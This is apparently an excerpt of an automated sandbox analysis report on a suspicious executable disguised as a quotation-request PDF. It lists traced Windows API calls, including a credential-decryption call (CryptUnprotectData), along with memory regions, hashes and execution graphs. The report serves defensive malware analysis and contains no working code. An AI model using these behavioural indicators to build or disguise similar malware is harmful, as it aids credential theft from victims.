                                                                                                                                  • Associated: 00000000.00000002.2521484999.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_REQUEST FOR QUOATION AND PRICES 0910775_pdf.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CloseCreateHandleProcess
                                                                                                                                  • String ID: Error launching installer
                                                                                                                                  • API String ID: 3712363035-66219284
                                                                                                                                  • Opcode ID: d9d25ead1e61dd1de32296c4779b051624e3cc0dc0aa34a2348a33ced0ef8ad4
                                                                                                                                  • Instruction ID: 39588cd766b2ea89d65183b6a6bcc828c6470883592abd44c37ede1670716c40
                                                                                                                                  • Opcode Fuzzy Hash: d9d25ead1e61dd1de32296c4779b051624e3cc0dc0aa34a2348a33ced0ef8ad4
                                                                                                                                  • Instruction Fuzzy Hash: B8E0B6B4600209BFEB109B64ED49F7B7AADEB04708F004665BD50F6191DB74EC158B78
                                                                                                                                  APIs
                                                                                                                                  • FreeLibrary.KERNEL32(?,75923420,00000000,C:\Users\user\AppData\Local\Temp\,004037E1,004035F6,?), ref: 00403823
                                                                                                                                  • GlobalFree.KERNEL32(?), ref: 0040382A
                                                                                                                                  Strings
                                                                                                                                  • C:\Users\user\AppData\Local\Temp\, xrefs: 00403809
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2521375985.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2521361831.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2521393084.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2521406226.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2521406226.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2521406226.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2521406226.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2521406226.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2521484999.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_REQUEST FOR QUOATION AND PRICES 0910775_pdf.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Free$GlobalLibrary
                                                                                                                                  • String ID: C:\Users\user\AppData\Local\Temp\
                                                                                                                                  • API String ID: 1100898210-823278215
                                                                                                                                  • Opcode ID: 5898abf10019027861f76b75f8a0bd4982bc330ca6c5028dc7fe5a6e65d5b297
                                                                                                                                  • Instruction ID: 1a021970d57ae41c51ef9a97853206db199f5c9852ffd88fd16926185a7b9e14
                                                                                                                                  • Opcode Fuzzy Hash: 5898abf10019027861f76b75f8a0bd4982bc330ca6c5028dc7fe5a6e65d5b297
                                                                                                                                  • Instruction Fuzzy Hash: 72E0EC3350162097C7216F55BD08B6AB7ACAF4DB22F4584BAE880BB2608B745C428BD8
                                                                                                                                  APIs
                                                                                                                                  • lstrlenW.KERNEL32(80000000,C:\Users\user\Desktop,00402E5A,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES 0910775_pdf.exe,C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES 0910775_pdf.exe,80000000,00000003,?,?,00000000,0040353A,?), ref: 00405A5B
                                                                                                                                  • CharPrevW.USER32(80000000,00000000,80000000,C:\Users\user\Desktop,00402E5A,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES 0910775_pdf.exe,C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES 0910775_pdf.exe,80000000,00000003,?,?,00000000,0040353A,?), ref: 00405A6B
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2521375985.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2521361831.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2521393084.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2521406226.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2521406226.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2521406226.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2521406226.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2521406226.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2521484999.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_REQUEST FOR QUOATION AND PRICES 0910775_pdf.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CharPrevlstrlen
                                                                                                                                  • String ID: C:\Users\user\Desktop
                                                                                                                                  • API String ID: 2709904686-1246513382
                                                                                                                                  • Opcode ID: 2f3bd6b78df313aedfed625dab12a62b748c0839e8540faa9dae91e8a46bacba
                                                                                                                                  • Instruction ID: bc07cd37d8a58f62a2b9a6dad95115890aa924a9f687d43278fd1307a4d4e217
                                                                                                                                  • Opcode Fuzzy Hash: 2f3bd6b78df313aedfed625dab12a62b748c0839e8540faa9dae91e8a46bacba
                                                                                                                                  • Instruction Fuzzy Hash: 7ED05EB2400D209AD312A714DC84DAF77ACEF1530074A446BF441A31A0D7785D918AA9
                                                                                                                                  APIs
                                                                                                                                  • GlobalAlloc.KERNEL32(00000040,?), ref: 1000116A
                                                                                                                                  • GlobalFree.KERNEL32(00000000), ref: 100011C7
                                                                                                                                  • GlobalFree.KERNEL32(00000000), ref: 100011D9
                                                                                                                                  • GlobalFree.KERNEL32(?), ref: 10001203
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2534828695.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2534807173.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2534847436.0000000010003000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2534867013.0000000010005000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_10000000_REQUEST FOR QUOATION AND PRICES 0910775_pdf.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Global$Free$Alloc
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 1780285237-0
                                                                                                                                  • Opcode ID: 9cbcb91a2cf1141c01d88779e182a67407fb9f9860b92084c2da8ef292891df1
                                                                                                                                  • Instruction ID: f345eba8489605592ce73ef35c78e6b42925bf5f5eceaf1f60f0973e38c56604
                                                                                                                                  • Opcode Fuzzy Hash: 9cbcb91a2cf1141c01d88779e182a67407fb9f9860b92084c2da8ef292891df1
                                                                                                                                  • Instruction Fuzzy Hash: AE318FF6904211DBF314CF64DC859EA77E8EB853D0B12452AFB45E726CEB34E8018765
                                                                                                                                  APIs
                                                                                                                                  • lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405E70,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405B9F
                                                                                                                                  • lstrcmpiA.KERNEL32(00000000,00000000), ref: 00405BB7
                                                                                                                                  • CharNextA.USER32(00000000,?,00000000,00405E70,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405BC8
                                                                                                                                  • lstrlenA.KERNEL32(00000000,?,00000000,00405E70,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405BD1
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2521375985.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2521361831.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2521393084.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2521406226.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2521406226.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2521406226.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2521406226.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2521406226.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2521484999.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_REQUEST FOR QUOATION AND PRICES 0910775_pdf.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: lstrlen$CharNextlstrcmpi
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 190613189-0
                                                                                                                                  • Opcode ID: c22d3165051237620b2fbf365f01d50e367ccce7d83d9982a11a9c9d857fbe9e
                                                                                                                                  • Instruction ID: ee410971918da6c20df7c5ac797640abd601cb5b02c8e88895b13af08820b85c
                                                                                                                                  • Opcode Fuzzy Hash: c22d3165051237620b2fbf365f01d50e367ccce7d83d9982a11a9c9d857fbe9e
                                                                                                                                  • Instruction Fuzzy Hash: 22F06231104958AFC7029BA5DD4099FBBB8EF55254B2540A9E840F7211D674FE019BA9

                                                                                                                                  Execution Graph

                                                                                                                                  Execution Coverage:10.3%
                                                                                                                                  Dynamic/Decrypted Code Coverage:100%
                                                                                                                                  Signature Coverage:0.7%
                                                                                                                                  Total number of Nodes:303
                                                                                                                                  Total number of Limit Nodes:31
                                                                                                                                  execution_graph 42493 db168 42494 db174 42493->42494 42497 383c2730 42494->42497 42498 383c273f 42497->42498 42503 383c0938 42498->42503 42504 383c0948 42503->42504 42505 383c0965 42504->42505 42512 383c0970 42504->42512 42524 383c0980 42504->42524 42508 383c188c 42505->42508 42510 383c1897 42508->42510 42511 383c2866 42510->42511 42547 383c1934 42510->42547 42513 383c0980 GetCurrentProcess 42512->42513 42515 383c0a18 GetCurrentThread 42513->42515 42516 383c0a11 42513->42516 42517 383c0a4e 42515->42517 42518 383c0a55 GetCurrentProcess 42515->42518 42516->42515 42517->42518 42519 383c0a8b 42518->42519 42536 383c0b4f 42519->42536 42540 383c0f31 42519->42540 42520 383c0ab3 GetCurrentThreadId 42521 383c0ae4 42520->42521 42521->42505 42525 383c09c6 GetCurrentProcess 42524->42525 42527 383c0a18 GetCurrentThread 42525->42527 42530 383c0a11 42525->42530 42528 383c0a55 GetCurrentProcess 42527->42528 42531 383c0a4e 42527->42531 42529 383c0a8b 42528->42529 42534 383c0b4f 2 API calls 42529->42534 42535 383c0f31 42529->42535 42530->42527 42531->42528 42532 383c0ab3 GetCurrentThreadId 42533 383c0ae4 42532->42533 42533->42505 42534->42532 42535->42532 42542 383c0bc8 DuplicateHandle 42536->42542 42544 383c0bc7 42536->42544 42537 383c0b8e 42537->42520 42541 383c0f3a 42540->42541 42541->42520 42543 383c0c5e 42542->42543 42543->42537 42545 383c0bc8 DuplicateHandle 42544->42545 42546 383c0c5e 42545->42546 42546->42537 42549 383c193f 42547->42549 42548 383c2ed4 42548->42510 42549->42548 42550 383c2e79 42549->42550 42558 383c3e40 42549->42558 42551 383c2ea9 42550->42551 42552 383c2ac4 11 API calls 42550->42552 42551->42548 42563 383c2ac4 42551->42563 42552->42551 42554 383c2ec1 42554->42548 42569 383cd5f8 42554->42569 42576 383cd608 42554->42576 42560 383c3e61 42558->42560 42559 383c3e85 42559->42550 42560->42559 42583 383c3ff0 42560->42583 42589 383c3fe0 42560->42589 42565 383c2acf 42563->42565 42564 383cd0a1 42564->42554 42565->42564 42566 383c0938 10 API calls 42565->42566 42567 383cd0bb 42566->42567 42730 383cc544 42567->42730 42570 383cd608 42569->42570 42571 383cd899 42570->42571 42573 383cdad0 WaitMessage 42570->42573 42574 383cd6ba 42570->42574 42737 383cc60c 42570->42737 42572 383c0938 10 API calls 42571->42572 42572->42574 42573->42570 42574->42548 42578 383cd66d 42576->42578 42577 383cd6ba 42577->42548 42578->42577 42579 383cd899 42578->42579 42581 383cdad0 WaitMessage 42578->42581 42582 383cc60c DispatchMessageW 42578->42582 42580 383c0938 10 API calls 42579->42580 42580->42577 42581->42578 42582->42578 42584 383c3ffd 42583->42584 42585 383c0938 10 API calls 42584->42585 42586 383c402b 42585->42586 42587 383c4036 42586->42587 42595 383c2bec 42586->42595 42587->42559 42590 383c3ffd 42589->42590 42591 383c0938 10 API calls 42590->42591 42592 383c402b 42591->42592 42593 383c4036 42592->42593 42594 383c2bec 13 API calls 42592->42594 42593->42559 42594->42593 42596 383c2bf7 42595->42596 42598 383c40a8 42596->42598 42599 383c2c20 42596->42599 42598->42598 42600 383c2c2b 42599->42600 42617 383c2c30 42600->42617 42603 383c4526 42655 383c40f8 42603->42655 42605 383c4540 42660 383c4108 42605->42660 42607 383c4547 42664 383c91d8 42607->42664 42671 383c91f0 42607->42671 42677 383c8400 42607->42677 42685 383c9067 42607->42685 42608 383c4551 42608->42598 42620 383c2c3b 42617->42620 42618 383c4517 42621 383c75cd 42618->42621 42627 383c73c8 42618->42627 42635 383c6fa0 42618->42635 42646 383c7200 42618->42646 42619 383c3e40 13 API calls 42619->42618 42620->42618 42620->42619 42622 383c75ea 42621->42622 42623 383c7700 42622->42623 42693 383c804f 42622->42693 42697 383c8060 42622->42697 42624 383c76d3 42624->42624 42629 383c73f7 42627->42629 42628 383c7700 42629->42628 42630 383c4108 3 API calls 42629->42630 42631 383c7447 42629->42631 42630->42631 42631->42628 42633 383c804f 3 API calls 42631->42633 42634 383c8060 3 API calls 42631->42634 42632 383c76d3 42632->42632 42633->42632 42634->42632 42637 383c6fc2 42635->42637 42636 383c6fa0 3 API calls 42639 383c722f 42636->42639 42637->42636 42638 383c7028 42637->42638 42637->42639 42638->42603 42640 383c4108 3 API calls 42639->42640 42641 383c7382 42639->42641 42642 383c7447 42639->42642 42640->42642 42641->42603 42642->42641 42644 383c804f 3 API calls 42642->42644 42645 383c8060 3 API calls 42642->42645 42643 383c76d3 42643->42643 42644->42643 42645->42643 42647 383c6fa0 3 API calls 42646->42647 42648 383c722f 42647->42648 42649 383c4108 3 API calls 42648->42649 42650 383c7382 42648->42650 42651 383c7447 42648->42651 42649->42651 42650->42603 42651->42650 42653 383c804f 3 API calls 42651->42653 42654 383c8060 3 API calls 42651->42654 42652 383c76d3 42652->42652 42653->42652 42654->42652 42658 383c4103 42655->42658 42657 383c89d3 42657->42605 42659 383c89d8 42658->42659 42701 383c8308 42658->42701 42659->42605 42661 383c4113 42660->42661 42662 383c8400 3 API calls 42661->42662 42663 383c901f 42661->42663 42662->42663 42663->42607 42665 383c915d 42664->42665 42667 383c91ea 42664->42667 42665->42664 42666 383c8400 3 API calls 42665->42666 42666->42665 42668 383c922d 42667->42668 42705 37d5fab0 42667->42705 42710 37d5faaf 42667->42710 42668->42608 42673 383c9221 42671->42673 42674 383c9321 42671->42674 42672 383c922d 42672->42608 42673->42672 42675 37d5fab0 3 API calls 42673->42675 42676 37d5faaf 3 API calls 42673->42676 42674->42608 42675->42674 42676->42674 42678 383c840b 42677->42678 42679 383c91c8 42678->42679 42680 383c8400 3 API calls 42678->42680 42681 383c91ea 42678->42681 42679->42608 42680->42678 42682 383c922d 42681->42682 42683 37d5fab0 3 API calls 42681->42683 42684 37d5faaf 3 API calls 42681->42684 42682->42608 42683->42682 42684->42682 42687 383c9076 42685->42687 42686 383c91c8 42686->42608 42687->42686 42688 383c8400 3 API calls 42687->42688 42689 383c91ea 42687->42689 42688->42687 42690 383c922d 42689->42690 42691 37d5fab0 3 API calls 42689->42691 42692 37d5faaf 3 API calls 42689->42692 42690->42608 42691->42690 42692->42690 42694 383c807d 42693->42694 42695 383c4108 3 API calls 42694->42695 42696 383c80c1 42694->42696 42695->42696 42696->42624 42698 383c807d 42697->42698 42699 383c4108 3 API calls 42698->42699 42700 383c80c1 42698->42700 42699->42700 42700->42624 42702 383c8313 42701->42702 42703 383c4108 3 API calls 42702->42703 42704 383c8b55 42702->42704 42703->42704 42704->42657 42706 37d5fadb 42705->42706 42707 37d5fb8a 42706->42707 42715 383c00b0 42706->42715 42725 383c00c0 42706->42725 42711 37d5fab0 42710->42711 42712 37d5fb8a 42711->42712 42713 383c00b0 3 API calls 42711->42713 42714 383c00c0 3 API calls 42711->42714 42713->42712 42714->42712 42716 383c00ba 42715->42716 42719 383c00fd CreateWindowExW 42715->42719 42717 383c00c9 42716->42717 42716->42719 42722 383c0104 CreateWindowExW 42717->42722 42723 383c00b0 CreateWindowExW CreateWindowExW 42717->42723 42724 383c0110 CreateWindowExW 42717->42724 42718 383c00f5 42718->42707 42721 383c0234 42719->42721 42722->42718 42723->42718 42724->42718 42726 383c00f5 42725->42726 42727 383c0104 CreateWindowExW 42725->42727 42728 383c00b0 CreateWindowExW CreateWindowExW CreateWindowExW 42725->42728 42729 383c0110 CreateWindowExW 42725->42729 42726->42707 42727->42726 42728->42726 42729->42726 42732 383cc54f 42730->42732 42731 383cd3bb 42731->42564 42732->42731 42734 383cc560 42732->42734 42735 383cd3f0 OleInitialize 42734->42735 42736 383cd454 42735->42736 42736->42731 42738 383ce708 DispatchMessageW 42737->42738 42739 383ce774 42738->42739 42739->42570 42742 37d5ce60 42743 37d5ce7c 42742->42743 42746 37d594b4 42743->42746 42745 37d5ce9b 42747 37d594bf 42746->42747 42748 37d5cf4f 42747->42748 42751 37d5cf59 42747->42751 42755 37d5cf68 42747->42755 42748->42745 42753 37d5cf67 42751->42753 42752 37d5d021 42752->42752 42753->42752 42759 37d595e8 42753->42759 42757 37d5cf96 42755->42757 42756 37d5d021 42756->42756 42757->42756 42758 37d595e8 3 API calls 42757->42758 42758->42756 42760 37d595f3 42759->42760 42761 37d5ec47 42760->42761 42763 37d5e7f4 42760->42763 42761->42752 42765 37d5e7ff 42763->42765 42764 37d5f111 42764->42761 42765->42764 42766 37d5fab0 3 API calls 42765->42766 42767 37d5faaf 3 API calls 42765->42767 42766->42764 42767->42764 42740 37cad9e0 CryptUnprotectData 42741 37cada54 42740->42741 42768 ad030 42769 ad048 42768->42769 42770 ad0a2 42769->42770 42777 383c1bcf 42769->42777 42782 383c1bd0 42769->42782 42787 383c0317 42769->42787 42793 383c02b7 42769->42793 42798 383c02c8 42769->42798 42803 383c03ff 42769->42803 42778 383c1bd0 42777->42778 42779 383c1c2f 42778->42779 42806 383c1d58 42778->42806 42816 383c1d57 42778->42816 42783 383c1bfd 42782->42783 42784 383c1c2f 42783->42784 42785 383c1d58 3 API calls 42783->42785 42786 383c1d57 3 API calls 42783->42786 42785->42784 42786->42784 42789 383c02d8 42787->42789 42788 383c0340 42788->42770 42789->42788 42791 383c1bcf 3 API calls 42789->42791 42792 383c1bd0 3 API calls 42789->42792 42790 383c030f 42790->42770 42791->42790 42792->42790 42794 383c02c8 42793->42794 42796 383c1bcf 3 API calls 42794->42796 42797 383c1bd0 3 API calls 42794->42797 42795 383c030f 42795->42770 42796->42795 42797->42795 42799 383c02d8 42798->42799 42801 383c1bcf 3 API calls 42799->42801 42802 383c1bd0 3 API calls 42799->42802 42800 383c030f 42800->42770 42801->42800 42802->42800 42804 383c0407 42803->42804 42842 383c084f 42803->42842 42804->42770 42807 383c1d66 42806->42807 42808 383c1d93 42806->42808 42813 383c1d6e 42807->42813 42830 383c1dc0 42807->42830 42834 383c1dbf 42807->42834 42808->42807 42809 383c1d98 42808->42809 42826 383c17d0 42809->42826 42811 383c1da4 42811->42779 42812 383c1dac 42812->42779 42813->42779 42817 383c1d58 42816->42817 42818 383c1d66 42817->42818 42819 383c1d98 42817->42819 42823 383c1d6e 42818->42823 42824 383c1dbf CallWindowProcW 42818->42824 42825 383c1dc0 CallWindowProcW 42818->42825 42820 383c17d0 GetCurrentThreadId 42819->42820 42821 383c1da4 42820->42821 42821->42779 42822 383c1dac 42822->42779 42823->42779 42824->42822 42825->42822 42827 383c17db 42826->42827 42838 383c181c 42827->42838 42829 383c22f5 42829->42811 42831 383c1e02 42830->42831 42833 383c1e09 42830->42833 42832 383c1e5a CallWindowProcW 42831->42832 42831->42833 42832->42833 42833->42812 42835 383c1dc0 42834->42835 42836 383c1e09 42835->42836 42837 383c1e5a CallWindowProcW 42835->42837 42836->42812 42837->42836 42839 383c1827 42838->42839 42840 383c2461 GetCurrentThreadId 42839->42840 42841 383c248b 42839->42841 42840->42841 42841->42829 42843 383c0856 42842->42843 42844 383c0938 10 API calls 42842->42844 42843->42804 42844->42843 42845 383c2020 SetTimer 42846 383c208c 42845->42846 42847 383c20c0 42849 383c20ed 42847->42849 42848 383c213c 42848->42848 42849->42848 42851 383c17fc 42849->42851 42852 383c1807 42851->42852 42853 383c17d0 GetCurrentThreadId 42852->42853 42854 383c229c 42853->42854 42855 383c22a5 42854->42855 42857 37d595e8 3 API calls 42854->42857 42858 37d5ec27 42854->42858 42855->42848 42857->42855 42859 37d5ec28 42858->42859 42860 37d5e7f4 3 API calls 42859->42860 42861 37d5ec47 42859->42861 42860->42861 42861->42855

                                                                                                                                  Control-flow Graph

                                                                                                                                  • Executed
                                                                                                                                  • Not Executed
                                                                                                                                  control_flow_graph 142 383cd608-383cd66b 143 383cd66d-383cd697 142->143 144 383cd69a-383cd6b8 142->144 143->144 149 383cd6ba-383cd6bc 144->149 150 383cd6c1-383cd6f8 144->150 152 383cdb7a-383cdb8f 149->152 154 383cd6fe-383cd712 150->154 155 383cdb29 150->155 156 383cd714-383cd73e 154->156 157 383cd741-383cd760 154->157 158 383cdb2e-383cdb44 155->158 156->157 164 383cd778-383cd77a 157->164 165 383cd762-383cd768 157->165 158->152 166 383cd77c-383cd794 164->166 167 383cd799-383cd7a2 164->167 169 383cd76c-383cd76e 165->169 170 383cd76a 165->170 166->158 171 383cd7aa-383cd7b1 167->171 169->164 170->164 172 383cd7bb-383cd7c2 171->172 173 383cd7b3-383cd7b9 171->173 175 383cd7cc 172->175 176 383cd7c4-383cd7ca 172->176 174 383cd7cf-383cd7ec call 383cc5c0 173->174 179 383cd941-383cd945 174->179 180 383cd7f2-383cd7f9 174->180 175->174 176->174 181 383cd94b-383cd94f 179->181 182 383cdb14-383cdb27 179->182 180->155 183 383cd7ff-383cd83c 180->183 184 383cd969-383cd972 181->184 185 383cd951-383cd964 181->185 182->158 191 383cdb0a-383cdb0e 183->191 192 383cd842-383cd847 183->192 187 383cd974-383cd99e 184->187 188 383cd9a1-383cd9a8 184->188 185->158 187->188 189 383cd9ae-383cd9b5 188->189 190 383cda47-383cda5c 188->190 193 383cd9e4-383cda06 189->193 194 383cd9b7-383cd9e1 189->194 190->191 206 383cda62-383cda64 190->206 191->171 191->182 195 383cd879-383cd88e call 383cc5e4 192->195 196 383cd849-383cd857 call 383cc5cc 192->196 193->190 234 383cda08-383cda12 193->234 194->193 204 383cd893-383cd897 195->204 196->195 207 383cd859-383cd877 call 383cc5d8 196->207 208 383cd908-383cd915 204->208 209 383cd899-383cd8ab call 383c0938 call 383cc5f0 204->209 210 383cda66-383cda9f 206->210 211 383cdab1-383cdace call 383cc5c0 206->211 207->204 208->191 227 383cd91b-383cd925 call 383cc600 208->227 235 383cd8ad-383cd8dd 209->235 236 383cd8eb-383cd903 209->236 223 383cdaa8-383cdaaf 210->223 224 383cdaa1-383cdaa7 210->224 211->191 226 383cdad0-383cdafc WaitMessage 211->226 223->191 224->223 231 383cdafe 226->231 232 383cdb03 226->232 240 383cd934-383cd93c call 383cc618 227->240 241 383cd927-383cd92a call 383cc60c 227->241 231->232 232->191 242 383cda2a-383cda45 234->242 243 383cda14-383cda1a 234->243 251 383cd8df 235->251 252 383cd8e4 235->252 236->158 240->191 247 383cd92f 241->247 242->190 242->234 248 383cda1c 243->248 249 383cda1e-383cda20 243->249 247->191 248->242 249->242 251->252 252->236
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000004.00000002.3320989243.00000000383C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 383C0000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_4_2_383c0000_REQUEST FOR QUOATION AND PRICES 0910775_pdf.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: DispatchMessage
                                                                                                                                  • String ID: $z=8$$z=8$$z=8$$z=8
                                                                                                                                  • API String ID: 2061451462-2894072396
                                                                                                                                  • Opcode ID: 2cc81013ff7bcd114b4c979662ed67b3dacf2e713b486d0bac04577270c1d76d
                                                                                                                                  • Instruction ID: 1f3e8bbd6f852c37c6c5216e0dcebffa84483fd9faaabbcc83e78677ae78abe1
                                                                                                                                  • Opcode Fuzzy Hash: 2cc81013ff7bcd114b4c979662ed67b3dacf2e713b486d0bac04577270c1d76d
                                                                                                                                  • Instruction Fuzzy Hash: B5F1F979A00209CFEB04DFA9C984BADBBF1BF88304F558559E409AB365DB74ED45CB80

                                                                                                                                  Control-flow Graph

                                                                                                                                  • Executed
                                                                                                                                  • Not Executed
                                                                                                                                  control_flow_graph 255 d4328-d4368 257 d436f-d444c call d3168 call d2c88 255->257 258 d436a 255->258 268 d444e 257->268 269 d4453-d4471 257->269 258->257 268->269 299 d4474 call d4611 269->299 300 d4474 call d4620 269->300 270 d447a-d4485 271 d448c-d4490 270->271 272 d4487 270->272 273 d4495-d449c 271->273 274 d4492-d4493 271->274 272->271 276 d449e 273->276 277 d44a3-d44b1 273->277 275 d44b4-d44f8 274->275 281 d455e-d4575 275->281 276->277 277->275 283 d44fa-d4510 281->283 284 d4577-d459c 281->284 288 d453a 283->288 289 d4512-d451e 283->289 290 d459e-d45b3 284->290 291 d45b4 284->291 294 d4540-d455d 288->294 292 d4528-d452e 289->292 293 d4520-d4526 289->293 290->291 295 d4538 292->295 293->295 294->281 295->294 299->270 300->270
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000004.00000002.3292800025.00000000000D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 000D0000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_4_2_d0000_REQUEST FOR QUOATION AND PRICES 0910775_pdf.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID: 0o@p$Lj@p$Lj@p$PH]q$PH]q
                                                                                                                                  • API String ID: 0-1229222154
                                                                                                                                  • Opcode ID: 62a2af1f899266e12456d38cdd114f6838589e21c2c95607f0ff4d43600bb640
                                                                                                                                  • Instruction ID: 89f1e99bb7555a50af553ce9d50351944eacdbe1314f2fa52c71a903fcd4de7c
                                                                                                                                  • Opcode Fuzzy Hash: 62a2af1f899266e12456d38cdd114f6838589e21c2c95607f0ff4d43600bb640
                                                                                                                                  • Instruction Fuzzy Hash: 5391E774E00218DFDB14DFA9D994A9DBBF2BF89300F14C16AE409AB365DB349945CF50
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000004.00000002.3292800025.00000000000D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 000D0000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_4_2_d0000_REQUEST FOR QUOATION AND PRICES 0910775_pdf.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID: (o]q$4']q$4']q$4']q
                                                                                                                                  • API String ID: 0-875651895
                                                                                                                                  • Opcode ID: e17ee925be0c9d95674729cb51f0e87dac21dabc34a3f49fb98bc03e8c033fd1
                                                                                                                                  • Instruction ID: 51adc00f259631d5cab4d7301834ec5121a594475381eb6c1882bef33211e195
                                                                                                                                  • Opcode Fuzzy Hash: e17ee925be0c9d95674729cb51f0e87dac21dabc34a3f49fb98bc03e8c033fd1
                                                                                                                                  • Instruction Fuzzy Hash: C4A26E71A04209DFCB15CFA8D994AAEBBF2BF88310F15856AE405DB361D734ED41CBA1

                                                                                                                                  Control-flow Graph

                                                                                                                                  • Executed
                                                                                                                                  • Not Executed
